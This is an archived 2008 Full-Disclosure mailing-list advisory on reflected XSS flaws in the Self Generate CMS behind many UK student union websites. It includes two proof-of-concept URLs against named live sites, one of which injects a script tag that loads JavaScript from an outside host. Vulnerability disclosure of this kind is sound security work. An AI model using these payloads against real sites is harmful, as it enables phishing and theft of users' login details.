full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] Multiple XSS Vulnerabiliti

[Full-disclosure] Multiple XSS Vulnerabilities in Self Generate CMS

From: Kærast <kaerast_at_nospam>
Date: Sat Aug 23 2008 - 15:49:01 GMT
To: full-disclosure@lists.grok.org.uk


Release Date: August 23 2008
Platform: Web
Severity: Important
Summary:

Bam host a large number of websites for student unions throughout the uk using a custom cms system called Self Generate. This vulnerability affects all of these websites and allows attackers to inject arbitrary html/javascript code into a browser session.

Status:

We have been unable to contact BamUK, SU Marketing, or Self Generate about this vulnerability. They have no email addresses listed and their contact form consistently returns error messages.

Details:

There are various instances throughout the cms system where html code can be injected into the page. The majority of these instances are where ‘page’ is passed as a GET value, eg. page=injected_data, which is improperly cleaned before being displayed in the sidebar. Successful exploitation of this could lead to users giving away their login details through a cleverly crafted url sent in a phishing email.

Poc:
http://www.ubuonline.co.uk/games/?referrer=main&page=%22%3E%3Cscript%20src=http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%3E%3C/script%3E

http://www.hullstudent.com/content/?page=%22%3Cscript%3Ealert(document.location)%3C/script%3E&text_only=2

Recommendations:

Use existing contacts at Bam/Self Generate to ask whether your website is secure against all attacks (including xss and sql injection), and not just the ones we discovered today. We believe that since the code is heavily reused across all websites, it should be a relatively simple fix following a full code audit.

Users may also consider switching to an alternative cms system hosted inhouse which would make security auditing and fixing of bugs like these much easier. -- Kærast _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/